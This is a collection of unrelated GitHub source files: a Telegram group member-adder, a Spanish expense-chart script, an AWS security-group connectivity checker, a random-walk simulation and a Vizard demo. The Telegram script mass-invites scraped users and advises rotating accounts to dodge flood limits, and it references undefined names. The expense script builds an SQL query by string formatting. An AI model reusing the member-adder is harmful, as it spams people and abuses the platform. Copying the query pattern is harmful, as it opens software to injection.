] | permissive | dagmawilencho/telegram-member-scraper-and-adder | 13b57b342257987d73c043eaaa139104630bf022 | 118a4df956917a636aa866ed863783ce0af92974 | refs/heads/main | 2023-06-21T20:37:31.205632 | 2021-07-23T10:16:23 | 2021-07-23T10:16:23 | 388,569,805 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,065 | py | from telethon.sync import TelegramClient
from telethon.tl.functions.messages import GetDialogsRequest
from telethon.tl.types import InputPeerEmpty, InputPeerChannel, InputPeerUser
from telethon.errors.rpcerrorlist import PeerFloodError, UserPrivacyRestrictedError
from telethon.tl.functions.channels import InviteToChannelRequest
import configparser
import os
import sys
import csv
import traceback
import time
import random
re="\033[1;31m"
gr="\033[1;32m"
cy="\033[1;36m"
print (re+"╔╦╗┌─┐┬ ┌─┐╔═╗ ╔═╗┌┬┐┌┬┐┌─┐┬─┐")
print (gr+" ║ ├┤ │ ├┤ ║ ╦ ╠═╣ ││ ││├┤ ├┬┘")
print (re+" ╩ └─┘┴─┘└─┘╚═╝ ╩ ╩─┴┘─┴┘└─┘┴└─")
print (cy+"version : 1.01")
print (cy+"Make sure you Subscribed Dagi Tech On Youtube")
print (cy+"www.youtube.com/c/DagiTech")
print (re+"NOTE :")
print ("1. Telegram only allow to add 200 members in group by one user.")
print ("2. You can Use multiple Telegram accounts for add more members.")
print ("3. Add only 50 members in group each time otherwise you will get flood error.")
print ("4. Then wait for 15-30 miniute then add members again.")
print ("5. Make sure you enable Add User Permission in your group")
cpass = configparser.RawConfigParser()
cpass.read('config.data')
try:
api_id = cpass['cred']['id']
api_hash = cpass['cred']['hash']
phone = cpass['cred']['phone']
client = TelegramClient(phone, api_id, api_hash)
except KeyError:
os.system('clear')
banner()
print(re+"[!] run python setup.py first !!\n")
sys.exit(1)
client.connect()
if not client.is_user_authorized():
client.send_code_request(phone)
os.system('clear')
banner()
client.sign_in(phone, input(gr+'[+] Enter the code: '+re))
users = []
with open(r"members.csv", encoding='UTF-8') as f: #Enter your file name
rows = csv.reader(f,delimiter=",",lineterminator="\n")
next(rows, None)
for row in rows:
user = {}
user['username'] = row[0]
user['id'] = int(row[1])
user['access_hash'] = int(row[2])
user['name'] = row[3]
users.append(user)
chats = []
last_date = None
chunk_size = 200
groups = []
result = client(GetDialogsRequest(
offset_date=last_date,
offset_id=0,
offset_peer=InputPeerEmpty(),
limit=chunk_size,
hash=0
))
chats.extend(result.chats)
for chat in chats:
try:
if chat.megagroup == True:
groups.append(chat)
except:
continue
print(gr+'Choose a group to add members:'+cy)
i = 0
for group in groups:
print(str(i) + '- ' + group.title)
i += 1
g_index = input(gr+"Enter a Number: "+re)
target_group = groups[int(g_index)]
target_group_entity = InputPeerChannel(target_group.id, target_group.access_hash)
mode = int(input(gr+"Enter 1 to add by username or 2 to add by ID: "+cy))
n = 0
for user in users:
n += 1
if n % 80 == 0:
sleep(60)
try:
print("Adding {}".format(user['id']))
if mode == 1:
if user['username'] == "":
continue
user_to_add = client.get_input_entity(user['username'])
elif mode == 2:
user_to_add = InputPeerUser(user['id'], user['access_hash'])
else:
sys.exit("Invalid Mode Selected. Please Try Again.")
client(InviteToChannelRequest(target_group_entity, [user_to_add]))
print("Waiting for 60-180 Seconds...")
time.sleep(random.randrange(0, 5))
except PeerFloodError:
print("Getting Flood Error from telegram. Script is stopping now. Please try again after some time.")
print("Waiting {} seconds".format(SLEEP_TIME_2))
time.sleep(SLEEP_TIME_2)
except UserPrivacyRestrictedError:
print("The user's privacy settings do not allow you to do this. Skipping.")
print("Waiting for 5 Seconds...")
time.sleep(random.randrange(0, 5))
except:
traceback.print_exc()
print("Unexpected Error")
continue
| [
"noreply@github.com"
] | noreply@github.com |
bca6be76ba08e67566f1f645e424b62b0801982c | 54623c4cb9e4f84867fd251ac83332cb9ab952cc | /Pruebas y funciones por separado/Funcion imprimir en pysiomple.py | 46e2dc0df861b5fe51c6546950c135f47cc2d6c9 | [] | no_license | SergioOrtegaMartin/Proyecto-Python-1-DAW- | 8cb4595c9691727a435233eeb2f30a1345bf4d1f | dae5f964d7e5dfbbc391d4cdcea581438a839a92 | refs/heads/main | 2023-08-25T23:04:26.079702 | 2021-10-27T11:33:32 | 2021-10-27T11:33:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,766 | py | import sqlite3
import os #Para listar los ficheros de un directorio
import matplotlib.pyplot as pyplot #Para hacer el gráfico
import random #Para obtener numeros al azar
from tkinter import * #Para hacer la ventana
from tkinter import colorchooser #Para importar el selector de color de tkinter
def crear_diccionario(fichero):
'''A esta funcion se le pasa como parametro el fichero en el que tenemos almacenados los datos
Con este fichero esta fucion nos DEVUELVE un diccionario cuyas claves serán el nombre del gasto y el valor será
la suma (int) de todos los gastos de ese tipo'''
try:
diccionario={}
f = open(fichero + '.csv')
longitud=len(f.readlines())
f.close
f = open(fichero + '.csv')
contador=0
while contador != longitud:
listalinea=f.readline().strip(', \n').split(',')
if listalinea[2] in diccionario:
diccionario[listalinea[2]]+=int(listalinea[3])
else:
diccionario[listalinea[2]]=int(listalinea[3])
contador+=1
return diccionario
except (TypeError):
print('\nNo existe aun el modelo introducido. \nHaz click en "Crear Otro Coche" en el menú')
def mostrar_grafico():
'''Obtiene las claves del diccionario, los slices son los valores de cada clave y los colores los obtiene de la funcion
definir_colores()'''
claves=list(diccionario.keys())
slices=list(diccionario.values()) #Llamamos asi a los valores para mostrarlo en la grafica
colores=definir_colores(claves)
pyplot.pie(slices, colors=colores, labels=claves, autopct='%1.1f%%') #Con esta linea creamos la grafica
pyplot.axis('equal') #Para hacer redonda la grafica
pyplot.title('Resumen de los gastos') #Le ponemos titulo a la grafica
#pyplot.legend(labels=claves) #Ponemos las leyendas de la grafica
pyplot.show() #Imprimimos la grafica
#pyplot.savefig('Imagen.png') Por si queremos guardarlo en un fichero de imagen
def prueba(fichero):
diccionario={}
f = open(fichero + '.csv')
a=f.readline()
print(a)
def crear_diccionario(coche):
lista=[]
diccionario={}
con = sqlite3.connect('proyecto.db')
cur = con.cursor()
cur.execute('select fecha, kms, concepto, detalle, coste from gasto where matricula="{}"'.format(coche))
tablas = cur.fetchall()
for u in tablas:
lista.append(u)
#print(lista)
for e in lista:
if e[2] in diccionario:
diccionario[e[2]]+=e[4]
else:
diccionario[e[2]]=int(e[4])
return diccionario
| [
"noreply@github.com"
] | noreply@github.com |
25b687df59c881d13c6435f5c8aa9b8fe2b5f1d7 | 3bc14074ac3f11c8469011877e32cc199eadcae2 | /spider_touyiao/config.py | c3c684262d9263810dd1315366ecb7aa8587b91d | [] | no_license | learncoderZ/spider_learning | 0475ca84826397329255e4e6e98cc01e625c20be | 4822ccda55c195990ccc828fc5fbf9aa0a88cc00 | refs/heads/master | 2021-09-04T03:56:19.029120 | 2018-01-15T15:34:09 | 2018-01-15T15:34:09 | 106,669,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 108 | py | MONGO_URL='localhost'
MONGO_DB='toutiao'
MONGO_TABLE='toutiao'
GROUP_START=1
GROUP_END=20
KEYWORD='街拍'
| [
"noreply@github.com"
] | noreply@github.com |
f9de3a87dd8997ea2ec1c0fd9715afb92d205967 | 3a416d74823987c5541de75122982edf3d7f2e20 | /can_they_connect.py | 4368b2e6e682514b18c31c530b7c83826f2330b9 | [] | no_license | andytumelty/aws-connectivity-tool | 48f2d9c6690c8848060b553606ffe994eecb02ba | dea54ad52c82e528976967c229955a4617ee1d2d | refs/heads/master | 2021-08-17T07:34:17.418835 | 2017-11-20T23:15:59 | 2017-11-20T23:15:59 | 111,032,218 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,565 | py | #!/usr/bin/env python3
import argparse
import boto3
import re
import configparser
import os
import logging
import ipaddress
import json
import pprint
# def get_resource_from_identifier(identifier):
# # TODO explicitly define connectivity scenarios
# # given an account/ip determine instance id
# # given a domain name, determine IP -> is that a LB? etc etc
# # for now, identifier must be AWS instance id
# return identifier
logging.basicConfig(format='%(levelname)s,%(message)s')
logger = logging.getLogger('default')
#logger.setLevel(logging.DEBUG)
logging.getLogger('boto3').setLevel(logging.INFO)
def get_boto_session(account):
# tries to work out what is meant by account, and return a relevant boto session
# checks the following: entry in can_they_connect.cfg (using aws_shared_credentials_file or aws_access_key_id and
# aws_secret_access_key parameters), a profile name in the default session
account_config = configparser.ConfigParser()
account_config.read('can_they_connect.cfg')
# if is in accounts.cfg
s = None
if account in account_config.sections():
logger.debug('account in can_they_connect.cfg, using config')
if 'aws_shared_credentials_file' in account_config[account]:
logger.debug('found aws_shared_credentials_file in config')
creds_file = configparser.ConfigParser()
creds_file.read(os.path.expanduser(account_config[account]['aws_shared_credentials_file']))
s = boto3.session.Session(
aws_access_key_id=creds_file['default']['aws_access_key_id'],
aws_secret_access_key=creds_file['default']['aws_secret_access_key']
)
elif {'aws_access_key_id', 'aws_secret_access_key'} <= set(account_config[account].keys()):
logger.debug('found aws_access_key_id and aws_secret_access_key in config')
s = boto3.session.Session(
aws_access_key_id=account_config[account]['aws_access_key_id'],
aws_secret_access_key=account_config[account]['aws_secret_access_key']
)
else:
raise Exception('unable to parse account credentials in can_they_connect.cfg')
else:
s = boto3.session.Session()
if account in s.available_profiles:
logger.debug('found account in profile for default session')
s = boto3.session.Session(profile_name=account)
if s is None:
raise Exception("Unable to create session with account %s" % account)
else:
return s
def get_resource(resource, session):
# given a resource identifier, returns appropriate boto3 resource
# current implementations:
# - EC2 instance from instance ID
# - EC2 instance from IP
# (possible) future implementations:
# - ELB
# - Security group
# - CIDR block
# - External connection
# - DNS
# - instance by tag
# EC2 Instance
logger.debug("finding resource type for %s" % resource)
if resource.split('-', 1)[0] == 'i':
logger.debug("got resource type instance %s" % resource)
instances = session.client('ec2').describe_instances(Filters=[{'Name': 'instance-id', 'Values': [resource]}])
if len(instances['Reservations']) == 1:
return {'type': 'instance', 'data': instances['Reservations'][0]['Instances'][0]}
else:
raise Exception("Couldn't find instance %s" % resource)
# IP address, for now assume EC2 instance
# FIXME this will match on external IPs, and non-valid ones like 500.500.500.500
elif re.match('^(\d{1,3}\.){3}\d{1,3}', resource):
logger.debug("got resource type IP address %s" % resource)
instances = session.client('ec2').describe_instances(Filters=[{'Name': 'private-ip-address', 'Values': [resource]}])
if len(instances['Reservations']) == 1:
logger.debug('found instance %s with IP address %s' % (instances['Reservations'][0]['Instances'][0]['InstanceId'], resource))
return {'type': 'instance', 'data': instances['Reservations'][0]['Instances'][0] }
elif len(instances['Reservations']) < 1:
logger.debug('no instance found for IP address %s, assuming external' % resource)
return {'type': 'ip_address', 'data': {'ip_address': resource}}
elif len(instances['Reservations']) > 1:
# FIXME raise better exception
raise Exception('More than 1 instance found for IP %s' % resource)
# c = boto3.client('elb')
# elbs = c.describe_load_balancers(LoadBalancerNames=['elb-outboundproxy-dcbc-prd1'])
# or DNS name
# if len(elbs['LoadBalancerDescriptions']) == 1
# elbs['LoadBalancerDescriptions'][0]['SecurityGroups'] -> ['sg-f0ae0289']
else:
raise NotImplementedError('resource %s not implemented' % resource)
def check_security_group(security_group, resource, inbound=True):
logger.debug("checking security group %s" % security_group)
if inbound:
permissions = security_group.ip_permissions
else:
permissions = security_group.ip_permissions_egress
# TODO add port and protocol
matching_rules = [r for r in permissions if check_rule(r, resource)]
logger.debug("found matching rules: %s" % matching_rules)
return matching_rules
def check_rule(rule, resource):
resource_security_groups = []
resource_ip = ''
# returns true if rule matches resource
if resource['type'] == 'instance':
resource_ip = ipaddress.ip_address(resource['data']['PrivateIpAddress'])
resource_security_groups = [sg['GroupId'] for sg in resource['data']['SecurityGroups']]
if resource['type'] == 'ip_address':
resource_ip = ipaddress.ip_address(resource['data']['ip_address'])
match = False
# FIXME this feels a bit crappy
cidr_blocks = [ipaddress.ip_network(i['CidrIp']) for i in rule['IpRanges']]
security_groups = [s['GroupId'] for s in rule['UserIdGroupPairs']]
if resource_ip != '':
for cidr_block in cidr_blocks:
if resource_ip in cidr_block:
logger.debug("rule %s matches resource IP" % rule)
return True
if resource_security_groups != []:
for security_group in security_groups:
if security_group in resource_security_groups:
logger.debug("rule %s matches resource sg" % rule)
return True
return match
def check_connectivity(resources):
logger.debug('checking connectivity between %s and %s' % (resources[0]['id'], resources[1]['id']))
checks = {}
logger.debug('checking egress from %s to %s' % (resources[0]['id'], resources[1]['id']))
# FIXME refactor
if resources[0]['resource']['type'] in ['instance']:
# find resource A security groups that allow egress to resource B
matching_sg = []
for sg in resources[0]['resource']['data']['SecurityGroups']:
sg_resource = resources[0]['session'].resource('ec2').SecurityGroup(sg['GroupId'])
matching_rules = check_security_group(sg_resource, resources[1]['resource'], False)
if matching_rules:
# matching_sg.append(security_group_to_dict(sg_resource, False))
matching_sg.append({'sg_id': sg_resource.id, 'matching_rules': matching_rules})
result = len(matching_sg) > 0
reason = '%s matching security groups found' % len(matching_sg)
checks['sg_egress'] = {'result': result, 'reason': reason, 'data': matching_sg}
else:
checks['sg_egress'] = {'result': True, 'reason': 'not applicable', 'data': []}
logger.debug('checking ingress from %s to %s' % (resources[0]['id'], resources[1]['id']))
if resources[1]['resource']['type'] in ['instance']:
matching_sg = []
for sg in resources[1]['resource']['data']['SecurityGroups']:
sg_resource = resources[1]['session'].resource('ec2').SecurityGroup(sg['GroupId'])
matching_rules = check_security_group(sg_resource, resources[1]['resource'], True)
if matching_rules:
# matching_sg.append(security_group_to_dict(sg_resource, False))
matching_sg.append({'sg_id': sg_resource.id, 'matching_rules': matching_rules})
result = len(matching_sg) > 0
reason = '%s matching security groups found' % len(matching_sg)
checks['sg_ingress'] = {'result': result, 'reason': reason, 'data': matching_sg}
else:
checks['sg_egress'] = {'result': True, 'reason': 'not applicable', 'data': []}
# if [resources[0]['resource'].subnet_id != resources[0]['resource'].subnet_id]:
# logger.debug('resources not in same subnet, checking routing')
# if [resources[0]['resource'].vpc_id != resources[0]['resource'].vpc_id]:
# logger.debug('resources not in same subnet, checking peering connection')
# different subnets?
# different VPC?
# VPC network ASG
# VPC peering
# routing table
# resource B inbound
return checks
# This should really be an encoder, but I'm also convinced I'm not the first person to want to do that.
# For now, extracting the fields I want is good enough.
def security_group_to_dict(sg, ingress=True):
if ingress:
perms = sg.ip_permissions
else:
perms = sg.ip_permissions_egress
return {
'id': sg.id,
'group_name': sg.group_name,
'rules': perms,
'vpc_id': sg.vpc_id
#'tags': sg.tags
}
def print_checks(checks):
# Desired Output
#
# Security Group Egress: Allowed
# └─ sg-123abc
# └─ 10.1.0.0/16 All
# └─ sg-123abc
# └─ 0.0.0.0/0 All
# └─ sg-123abc
# └─ 0.0.0.0/0 All
# Security Group Ingress: Allowed
# └─ sg-123ab22c
# └─ 10.0.0.0/8 8301/TCP
# └─ sg-123abc
# └─ sg-abc123 -1
# TODO refactor ingress and egress
if 'sg_egress' in checks.keys():
if checks['sg_egress']['result']:
result = 'Allowed'
else:
result = 'Blocked'
result = '%s (%s)' % (result, checks['sg_egress']['reason'])
print('Security Group Egress: %s' % result)
for match in checks['sg_egress']['data']:
print(' └─ %s' % match['sg_id'])
for rule in match['matching_rules']:
groups = [g['GroupId'] for g in rule['UserIdGroupPairs']]
ipranges = [c['CidrIp'] for c in rule['IpRanges']]
allowed = groups + ipranges
# TODO print port and protocol
print(' └─ %s' % ','.join(allowed))
if 'sg_ingress' in checks.keys():
if checks['sg_ingress']['result']:
result = 'Allowed'
else:
result = 'Blocked'
result = '%s (%s)' % (result, checks['sg_ingress']['reason'])
print('Security Group Ingress: %s' % result)
for match in checks['sg_ingress']['data']:
print(' └─ %s' % match['sg_id'])
for rule in match['matching_rules']:
groups = [g['GroupId'] for g in rule['UserIdGroupPairs']]
ipranges = [c['CidrIp'] for c in rule['IpRanges']]
allowed = groups + ipranges
# TODO print port and protocol
print(' └─ %s' % ','.join(allowed))
if __name__ == '__main__':
# a -> b over port and protocol
parser = argparse.ArgumentParser(
description='Check connectivity between 2 AWS resources.',
# FIXME is there a better way of doing this with formatting?
epilog="Resource ordering: connectivity is checked from Resource 1 -> Resource 2.\n\n"
"Examples:\n"
"=========\n\n"
# "./can_they_connect.py ops/i-123abc np/10.1.2.3 TCP/8301"
# "=> can instance i-123abc in ops connect to the instance(*) with IP 10.1.2.3 over TCP/8301?"
# "./can_they_connect.py i-123abc i-456def\n"
# "Check which connections can be initiated from instance i-abc123 to instance i-456def\n"
# "in the same AWS account\n\n"
# "./can_they_connect.py 123123:i-123abc i-456def\n"
# "Check which connections can be initiated from instance i-abc123 in the AWS account 123123\n"
# "to instance i-456def in the inherited shell AWS account (see AWS accounts and credentials below)\n\n"
# ""
)
parser.add_argument('resource1', nargs=1, metavar='resource')
parser.add_argument('resource2', nargs='+', metavar='resource')
args = parser.parse_args()
resources = args.resource1 + args.resource2
for n, resource in enumerate(resources):
if '/' in resource:
account = resource.split('/', 1)[0]
resource_id = resource.split('/', 1)[1]
session = get_boto_session(account)
else:
resource_id = resource
session = boto3.session.Session()
# TODO extend for non-instance resources
resources[n] = {
'id': resource_id,
'resource': get_resource(resource_id, session),
'session': session
}
while len(resources) > 1:
checks = check_connectivity(resources[:2])
#pp = pprint.PrettyPrinter(indent=4)
#pp.pprint(checks)
print_checks(checks)
resources = resources[1:]
| [
"andrew.tumelty@gmail.com"
] | andrew.tumelty@gmail.com |
8a5799a5b8ba3118f6b7fb2c66b40d952a20f849 | b01dad2f9676a612c1b4e57c982dda923446e9a3 | /board.py | 8b6fc7d749fa49b29205595f1319ce64a93c67a6 | [
"MIT"
] | permissive | DandrePie/monte-carlo-walkers | ccf237dcb9712115d9ee634067982123f78e78e0 | 9365d3b7a7442af7adffe636adce5effedb0363b | refs/heads/main | 2023-07-10T20:21:39.934808 | 2021-08-19T13:09:21 | 2021-08-19T13:09:21 | 395,003,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,592 | py | class Board:
'''
A class to simulate the grid on which the random walkers walk
...
Attributes
----------
board_size: int
The board_size represents the size of the n*n grid
inbounds: str
'In boundary' - the random walkers are within the bounds
of the grid
'On boundary' - the random walkers are on the bounds of
the grid - end condition for the simulation
met: str
'Not met' - the random walkers have not met on the grid
'Met' - the random walkers met on the grid
store_location: bool
If store_location is True the paths of the walkers are stored
walker_location: list
List that stores walker paths
'''
def __init__(self, board_size=9, store_location=True):
self.board_size = board_size
self.inbounds = 'In boundary'
self.met = 'Not met'
if store_location:
self.walker_location = []
def simulate_walk(self, walker1, walker2):
'''
Simulates the random walk of the walkers on the grid
Handles the speed of each walker
Parameters:
walker1: Walker object - location at the bottom left of grid
walker2: Walker object - location at the top right of grid
'''
# append initial locations of random walkers to walker_location
self.location_update(walker1, walker2)
while self.inbounds == 'In boundary' and self.met == 'Not met':
for speed in range(1, max(walker1.speed, walker2.speed)+1):
if speed <= walker1.speed and speed <= walker2.speed:
walker1.walk(self.board_size)
walker2.walk(self.board_size)
elif walker1.speed < speed <= walker2.speed:
walker2.walk(self.board_size)
elif walker1.speed >= speed > walker2.speed:
walker1.walk(self.board_size)
#Store locations of walkers on the board
self.location_update(walker1, walker2)
#Check if walkers are still within the boundary of the board or that they have met on the board
self.end_walk_condition(walker1, walker2)
if self.inbounds == 'On boundary' or self.met == 'Met':
break
def end_walk_condition(self, walker1, walker2):
'''
Checks if the walkers have met of the grid or if they are still within bounds
- modifies the inbounds and met attributes.
Parameters:
walker1: Walker object - location at the bottom left of grid
walker2: Walker object - location at the top right of grid
'''
walk1_end = walker1.x == self.board_size and walker1.y == self.board_size
walk2_end = walker2.x == 1 and walker2.y == 1
if walk1_end or walk2_end:
self.inbounds = 'On boundary'
if [walker1.x, walker1.y] == [walker2.x, walker2.y]:
self.met = 'Met'
def location_update(self, walker1, walker2):
'''
Appends the location of the walkers to the walker location list
Parameters:
walker1: Walker object - location at the bottom left of grid
walker2: Walker object - location at the top right of grid
'''
if self.store_location:
self.walker_location.append([[walker1.x, walker1.y], [walker2.x, walker2.y]])
else:
pass
| [
"noreply@github.com"
] | noreply@github.com |
4c699101fa8582289ec996b5664bd8ab5b3ec4f5 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03032/s297706816.py | d7371f5e563b20937599d014765a4d6f1b0ebd4c | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 743 | py | n,k=map(int,input().split())
v=list(map(int, input().split()))
if k<n*2:
ans=0
for i in range(k+1):
for j in range(k-i+1):
v_r=v[:i]
v_l=v[(n-j):]
sute_cnt=k-(i+j)
v_new=v_r+v_l
v_new.sort()
# print(i, j, v_r, v_l, sute_cnt, v_new)
s=sum(v_new)
if not v_new:
continue
for indx in range(len(v_new)):
if v_new[indx]<0 and sute_cnt>0:
s-=v_new[indx]
sute_cnt-=1
else:
break
ans=max(ans,s)
print(ans)
else:
ans=0
for i in range(n):
if v[i]>=0:
ans+=v[i]
print(ans)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
c533ef9a968126380026d4ab1d1f48566fd1741a | 2e59e8ab519227e07665e3c06f2a77d77a4b8e90 | /key_value_store/wsgi.py | a3f9ab3ed84f8383fb3a03a093fa5ab2ebd0d268 | [] | no_license | rofi93/key_value_store | 3218b9bebebc5cc4ef2e932437484de88d402256 | 0dfc7a992f0ae199d0b1d7c70ff3c607027feb19 | refs/heads/master | 2022-02-18T09:39:48.514722 | 2019-12-26T09:18:33 | 2019-12-26T09:18:33 | 230,210,256 | 0 | 1 | null | 2022-02-10T09:02:42 | 2019-12-26T06:41:32 | Python | UTF-8 | Python | false | false | 407 | py | """
WSGI config for key_value_store project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'key_value_store.settings')
application = get_wsgi_application()
| [
"khairul.basar93@gmail.com"
] | khairul.basar93@gmail.com |
95a3fd656911c6d823850e0ce1362c717f5b5152 | 8eff7831838d2e76225c4f066cfd26fd406990b3 | /Customer/admin.py | cf7d9df86c5b0da7430e616169e66931ae76c872 | [] | no_license | iwangjintian/PPEcommerce2 | 22d7102ff20e1b323a9908a84f0cb20b92056000 | d97166a957937612be0c2af724984e27fdb262b1 | refs/heads/master | 2021-01-20T00:13:22.348253 | 2017-04-23T02:19:40 | 2017-04-23T02:19:40 | 89,096,491 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 292 | py | from django.contrib import admin
from .models import *
# Register your models here.
admin.site.register(Customer)
admin.site.register(Service_Request)
admin.site.register(Shipping_Address)
admin.site.register(Billing_Address)
admin.site.register(Payment_Method)
admin.site.register(Security) | [
"597493748@qq.com"
] | 597493748@qq.com |
079e74a7a90253b0ac6a7c0bd044c290d9481ada | 4e67f09cf6dc3d10062c9c3e4a5266fd5385d5ed | /cli.py | bb0a80bdce8e445f23db141f9b36560dab92f62e | [] | no_license | misogynyX/news-crawler | 30b7bfd7c3d4be0ba84e63735ac2b61ea65dbaa0 | 629b57519f48e4c58fa5269efbe0385701fcc704 | refs/heads/master | 2023-01-22T05:27:42.950270 | 2020-11-18T08:04:58 | 2020-11-18T08:04:58 | 255,079,673 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,770 | py | import csv
import itertools
import json
import os
import sys
from datetime import date, datetime, timedelta
from multiprocessing import Pool
from urllib import request
import fire
import crawl
DATA_DIR = 'data'
CAP = date(2016, 1, 1)
OVERWRAP = 3
class CLI:
"""News crawler"""
def fetch_missings(self):
"""해당 일자의 파일이 없는 경우에만 새로 받아오기"""
os.makedirs(DATA_DIR, exist_ok=True)
pool = Pool(16)
existing_files = {line[:8] for line in sys.stdin}
today = crawl.get_kst_today()
n_days = (today - CAP).days + 1
for day in range(n_days):
filename = (CAP + timedelta(days=day)).strftime('%Y%m%d')
overwraps = day >= n_days - OVERWRAP
exists = filename in existing_files
if not overwraps and exists:
continue
print(f'{filename}.csv', end=' ', flush=True)
articles = fetch_a_day(filename, pool)
print(len(articles))
with open(os.path.join(DATA_DIR, f'{filename}.csv'), 'w') as f:
write_csv(articles, f)
pool.terminate()
def fetch(self, date, out=sys.stdout):
articles = fetch_a_day(date)
write_csv(articles, out)
def fetch_a_day(yyyymmdd, pool):
page_size = 200 # max page size allowed by api
# fetch first page to calculate total_pages
first_page, total_articles = fetch(yyyymmdd, 0, page_size)
total_pages = round(total_articles / page_size + 0.5)
# fetch rest pages
params = [(yyyymmdd, index, page_size) for index in range(1, total_pages)]
results = pool.starmap(fetch, params)
rest_pages = [r[0] for r in results]
# cleanse
all_articles = []
for page in [first_page] + rest_pages:
for article in page:
all_articles.append(article)
return crawl.cleanse(all_articles)
def fetch(yyyymmdd, page_index, page_size):
"""Fetches news articles"""
# fetch
url = (
f'http://m.media.daum.net/proxy/api/mc2/contents/ranking.json?' \
f'service=news&pageSize={page_size}®Date={yyyymmdd}&page={page_index + 1}'
)
with request.urlopen(url) as f:
data = json.loads(f.read().decode('utf-8'))
return data['data'], data['totalCount']
def write_csv(articles, out):
# write as csv
fields = [
'article_id', 'cp_name', 'title', 'description', 'authors', 'keywords'
]
csvw = csv.DictWriter(out, fields)
csvw.writeheader()
for article in articles:
keywords = ';'.join(article['keywords'])
authors = ';'.join(article['authors'])
csvw.writerow({**article, 'keywords': keywords, 'authors': authors})
if __name__ == '__main__':
fire.Fire(CLI())
| [
"kkyueing@gmail.com"
] | kkyueing@gmail.com |
92e7c8831b110adf86347d7b020099eeb5daa74c | 80682560668fcdc7e9f270761dcd2a52ffa91ee1 | /RealTimeEdgeDetectionAndObjectCreation.py | cde70ec6add062d99be6c72d6240badadcf19ee1 | [] | no_license | gabrielDiaz-performlab/IMSG-789 | f630ac852c321fc1c459c1f430122e384602bc4f | f1a24afd05639bdd12c3f122b6dd7b3183d1d270 | refs/heads/master | 2021-08-02T23:37:47.032375 | 2016-05-04T14:02:59 | 2016-05-04T14:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,981 | py | import viz
import vizshape
import vizact
import math
import cv2
import numpy as np
# Enable full screen anti-aliasing FSAA to smooth edges
#viz.setMultiSample(4)
# Increase the field of view(fov) to 60 degrees from default 40 degress
#viz.fov(60)
# viz.go starts an empty world
viz.window.setPosition( 0, 0 )
#Set the application window's size
#in coordinates.
viz.window.setSize( 1024, 512 ) # Set the window size to match the exact resolution of image
viz.go()
viz.clearcolor(viz.SKYBLUE)
viz.MainView.getHeadLight().enable()
viz.MainView.setPosition([5.12,-2.56,-1]) # Set the camera center based on the image resolution,
# y is negative so that pixel cordinates match vizard coordinates
viz.phys.enable()
img = cv2.imread('LineImage.jpg')
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
wallUpZ = vizshape.addPlane(
size = [10.24,5.12], # Set the image plane to match the exact resolution of image in metres
axis = -vizshape.AXIS_Z,
cullFace = False
)
wallUpZ.setPosition(5.12,-2.56,6.0) # Set the imaple plane center based on the image resolution
pic = viz.addTexture('LineImage.jpg')
wallUpZ.texture(pic)
midX = 512 # Based on horizontal image size
def createPhysicalObjects():
global midX
minLineLength = 3
maxLineGap = 0.5
edge = cv2.Canny(gray,100,200)
lines = cv2.HoughLinesP(edge,1,np.pi/180,100,minLineLength,maxLineGap)
noOfLines = lines.size/4
print noOfLines
i = 0
while(i < noOfLines):
for x1,y1,x2,y2 in lines[i]:
print x1,y1,x2,y2
midX = (float(x1) + float(x2))/2
midY = (float(y1) + float(y2))/2
x = float(midX)/100
y = -float(midY)/100
angle = int(math.atan((y1-y2)/(x2-x1))*180/math.pi)
#print angle
box = vizshape.addBox(splitFaces=True)
box.setPosition(x,y,6.0)
xDiff = math.fabs(x1-x2)
yDiff = math.fabs(y1-y2)
square = math.pow(xDiff,2) + math.pow(yDiff,2)
boxSize = math.sqrt(square)/100
box.setScale(boxSize,0.02,0.5)
#box.enable(viz.SAMPLE_ALPHA_TO_COVERAGE)
box.color(viz.SKYBLUE)
box.collideBox()
box.disable(viz.DYNAMICS)
box.setEuler(0,0,angle)
i+=2
def onKeyDown(key):
if key == ' ':
print 'Space Key Pressed'
ball1 = viz.add('soccerball.ive') #Add an object.
ball1.setPosition(1.0,-1,6.0)
ballPhys1 = ball1.collideSphere(bounce=1.5) # Define ball's physical properties
ball1.applyForce([0.01,0,0],1)
if key == 'c':
print 'Calculating edges and creating physical objects'
createPhysicalObjects()
viz.callback(viz.KEYDOWN_EVENT,onKeyDown)
view = viz.MainView
MOVE_SPEED = 5
TURN_SPEED = 60
def updateView():
if viz.key.isDown('W'):
view.move([0,0,MOVE_SPEED*viz.elapsed()],viz.BODY_ORI)
elif viz.key.isDown('S'):
view.move([0,0,-MOVE_SPEED*viz.elapsed()],viz.BODY_ORI)
elif viz.key.isDown('D'):
view.setEuler([TURN_SPEED*viz.elapsed(),0,0],viz.BODY_ORI,viz.REL_PARENT)
elif viz.key.isDown('A'):
view.setEuler([-TURN_SPEED*viz.elapsed(),0,0],viz.BODY_ORI,viz.REL_PARENT)
vizact.ontimer(0,updateView)
| [
"arun.pattu9@gmail.com"
] | arun.pattu9@gmail.com |
